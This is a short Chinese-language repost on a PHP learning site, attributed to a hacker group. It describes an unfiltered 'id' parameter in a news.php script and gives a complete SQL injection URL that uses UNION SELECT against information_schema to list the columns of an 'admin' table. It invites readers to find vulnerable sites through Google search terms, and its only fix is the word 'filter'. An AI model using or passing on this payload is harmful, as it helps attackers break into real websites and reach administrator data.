来源:自学PHP网 时间:2015-04-17 14:47 作者: 阅读:次
[导读] Disqus是世界著名的实时评论系统,如果对其不了解,可以自己Google一下转载请注明来自:Silic Group Hacker Army首发好吧,其实这漏洞太弱了其实就是news.php对id值没过滤。看实例吧:http://...
|
Disqus是世界著名的实时评论系统,如果对其不了解,可以自己Google一下 转载请注明来自:Silic Group Hacker Army首发 好吧,其实这漏洞太弱了 其实就是news.php对id值没过滤。看实例吧: http://www.2cto.com /news.php?id=-1+union+select+1,2,3,4,GROUP_CONCAT(DISTINCT+column_name),6,7,8+from+information_schema.columns+where+table_name=0x61646d696e
Google关键字自己找就好了, 修复就是:过滤 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
